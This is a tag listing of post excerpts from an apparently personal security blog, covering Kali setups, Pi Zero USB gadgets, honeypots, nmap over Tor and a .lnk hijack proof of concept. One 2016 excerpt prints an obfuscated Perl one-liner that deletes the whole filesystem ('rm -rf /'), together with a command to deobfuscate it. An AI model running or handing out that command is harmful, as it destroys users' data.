#hacking
33 posts
21 Apr 2022
10 Feb 2022
Hackathons, innovation days, codefests — whatever you call them — have been a feature of the tech industry for the last 20 years, and one of the most powerful ideation tools at our disposal. The premise is simple, given a theme or problem space, the hackathon participants must self-organise into teams to explore ideas, write some code, and deliver a…
14 Jul 2017
Security summer camp is about a week away so I spent some time this afternoon trying to figure out what talks and events I want to make sure I attend. BSides Las Vegas: A Day in the Life of a Product Security Incident Response Manager From SOC to CSIRT Hadoop Safari : Hunting For Vulnerabilities Introduction to Reversing and Pwning…
12 Jun 2017
Often while doing research I need temporary access to a bunch of different virtual machines. While it is possible to do this on my Macbook using VMWare Fusion or Virtualbox the overhead seems unnecessary for something I will delete in under a week. My goto solution is a virtualization stack of: 16GB DigitalOcean Droplet + Wok + Kimchi Here is…
8 Mar 2017
Certificate transparency logs are an amazing way to get a good overview of your certificate landscape, detect fraud (bad guys also use TLS) and find shadow IT and unknown cloud services. The problem is that there are not many good places to search these logs. The best I have found is from Symantec, although it is slow and errors out…
5 Mar 2017
Ever since Charlie Miller hacked a Jeep while it was driving on the interstate I have wanted to learn more about Car Hacking but really had not had a chance to get started with it until a month ago when I ordered a Carloop and was ready to get hacking: … or so I thought. Turns out car hacking is…
20 Jan 2017
I was lucky enough to get a hold of an Insta360 Nano this week and it is some of the most amazing technology I have seen recently. It allows for truly instant 360 photos, videos and timelapse captures. As one of the people I was showing it to this week said it is the “selfiestick of 2017”. Here are some…
6 Jan 2017
Scanning a host with Nmap is a fairly routine act for some in security to do but you from time to time you want to either get a different view of a host or try to conceal your public IP. In this case I use this simple “trick” to run an nmap scan through TOR. To do so you need…
30 Dec 2016
Yesterday US-Cert released information on GRIZZLY STEPPE the malware used in the DNC hack. The IP and hash information provided by the US-Cert was really lacking so I decided to dig through it and see if I could make more of it. The first thing I did was to run the IPs through an ipinfo2sheets spreadsheet I put together earlier…
29 Dec 2016
In November I saw this youtube video on turning a USB Air Purifier into a $75 USB Killer: My soldering skills are basically nonexistent so while I had some time off around the holidays I decided this would be a decent project to help improve them. So in early December I ordered 3 of these from Amazon: USB ionic Oxygen…
22 Dec 2016
I had a coach whose favorite quote was “Pain is the best teacher.” and that was the first thing that popped into my head this morning when I realized that I had left an $80 a month Digital Ocean Droplet running for an extra 3 weeks after I got done using it. To be honest $60 isn’t *that* painful but…
21 Dec 2016
I am a huge fan of snow and hacky one line linux commands. Thanks to some amazing people on twitter and a little too much free time at the end of the year they have both combined to bring snow to your terminal window just in time for your winter based holiday. This command works on OSX out of the…
20 Dec 2016
What will 2017 hold for the security industry? I sat down and looked into my crystal ball and came up with these 8 security predictions for 2017. A Fortune 500 Will Use “DDOS as a Service” To Attack A Competitor. A bored VP of Marketing with a paypal account, a six pack and a nephew who can get him on…
4 Dec 2016
I have been playing with my stack of pizero a bunch lately and tonight I decided to put together a piZero OTG Ethernet gadget that runs Kali (Really KaToolin), XRDP and Mate in a computer on a stick configuration. This way I have a full (as I want it to be) Kali installation with me as long as I have…
30 Nov 2016
I have been playing with my stack of piZero’s recently and started to read about the kernel OTG gadgets and was intrigued by the OTG_HID gadget. So after doing some reading I found that someone had ported the USB Rubber Ducky platform to the piZero and called it rspiducky. Building it is fairly straight forward but if you if you…
28 Nov 2016
I have been reading a lot about Beacon Frames on my vacation this week (stop laughing) and I came across a tool in Kali called MDK3 that will allow you to send fake beacon frames. I couldnt pass up a chance to test this so I pulled out my trusty TL-WN722N and made a list of the 5,0000 most common…
26 Nov 2016
Thanks to PoisonTap I have finally had a reason to pull my PiZero out of the ever growing “Stuff to Hack” pile and start working on it. I have a couple of neat ideas that are coming down the pipeline but this weekend I built a VPN sidecar using a USB OTG Gadget. I wanted to be able to use…
4 Nov 2016
I am often asked “What is the easiest thing companies can do to secure their networks?” and my answer is always always “Know what is on your network.” While that is simple advice it is a lot harder to implement. One company I was working with was looking at a system to do continuous network monitoring (read: scheduled nmap scans)…
20 Oct 2016
I use DigitalOcean for a majority of my testing and from time to time I need a desktop environment to run some of my tools (like burp). After spending much more time than I want to admit I have it down to these 10 commands to bring a Ubuntu + Mate + XRDP desktop to a Ubuntu Droplet : sudo…
17 Oct 2016
Earlier this week someone sent me this one line perl script (that you shouldn’t run): perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see' Due to some really clever code obfuscation it runs rm -rf /. You can deobfuscate (is that word?) with this: perl -e 's;;=]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;print "$_\n"' While trying to figure out how this code code I stumbled upon…
5 Oct 2016
Recently I have been working with some NGFW tools to automatically detect and block when someone is scraping, brute forcing or “load testing” your website. I quickly ran into a problem where none of the tools I use would allow me to quickly change user agents so I put together a couple of quick scripts that call one of 7500…
25 Aug 2016
One of the first things I like to do when I start looking at a PCAP during an investigation is run it through snort to see if it finds anything suspicious. You can easily do this at the command line with snort -dv -r test.pcap but the output is not great. I have been using a tool called websnort for…
17 Aug 2016
My friends at DigitalOcean were nice enough to give me a generous amount of credit on their cloud platform to do some security research with so I decided to do the most reckless thing I could think of and run a full ssh honeypot on the internet. The build out is pretty simple, it is the SSHoneypot Docker Container I…
25 Jul 2016
I took some time tonight and read through the Security Summer Camp (BSidesLV, Blackhat and Defcon) schedules and picked the talks from this year that I think will be the best and that I do not want to miss. I ended up with these 16 talks I am going to make a special point to see next week: BSidesLV Managing…
15 Jul 2016
We are two weeks away from Security Summer Camp (which is BSidesLV, Blackhat and Defcon)! So it is time for everyone to write their annual blog posts about what you must do before you head out. I want to be one of the cool kids so here is my list of 6 things to do before you pack: Delete All…
13 Jul 2016
While doing security research it is not uncommon for me to build and destroy between 20 and 25 cloud servers a week on Digital Ocean. While there are great guides like: My First 10 Minutes On a Server – Primer for Securing Ubuntu My First 5 Minutes On A Server; Or, Essential Security for Linux Servers I do not have…
10 Jul 2016
There has been a lot of talk about why you should use a VPN on public networks and why it shouldn’t be a commercial one. I am a huge fan of the Streisand privacy stack because it includes and L2TP/IPsec VPN, OpenConnect, OpenSSH, OpenVPN, Shadowsocks, sslh, Stunnel, and a Tor bridge all in one amazing package. The problem with Streisand…
6 Jul 2016
One of the tips that security professionals love to give is to use a VPN on public wifi networks. This is great advice and (I personally like PrivateInternetAccess and NordVPN). Recently I noticed nike.com blocks traffic from TOR and VPN providers: That got me wondering what other websites were blocking traffic from these sources so I decided to test the…
4 Jul 2016
I had a 2014 Dell Chromebook 11 I was not doing anything so I decided to turn it into a stand alone Kali box using the Chromium OS Universal Chroot Environment. The installation steps are pretty simple: Add a l33t hacker sticker: Enable Developer Mode (this will wipe the device). Login and download the latest crouton. Access the terminal by…
23 Jun 2016
A picture started floating around the internet of Mark Zuckerberg holding an Instagram cutout: People almost instantly started to notice that his webcam and mic were taped over. While Mark Zuckerberg isnt exactly known for having great security practices, all his social media passwords were Dadada. This started a discussion in the office if someone could really spy on you…
20 Jun 2016
While rebuilding my iPad this weekend I noticed that I could name it an emoji. So I named my iPad 📱(U+1F4F1): While I don’t have any problem using the iPad it basically makes it unreachable on the network via hostname. From there I renamed all of my lab machines emojis. Mostly variations of 💩 (U+1F4A9) because I am sophomoric: In…
12 Jun 2016
Earlier today I ran across this blog post on hijacking windows .lnk file so I decided to build out and test a full POC for it using Windows 8.1. To reproduce this just copy these 7 lines into powershell and ctrl+c now runs calc.exe instead of copying your text: https://gist.github.com/jgamblin/4aa897a2cca6912eeea96a12d73d8cd6 For extra jerkiness this will shutdown a windows machine when…
27 Dec 2015
I recently finished reading Ghost in the Wires by Kevin Mitnick. It is the story of Mitnick’s hacking career, from the start in his teens, through becoming the FBI’s most wanted hacker, to spending years in jail before finally being … Continue reading →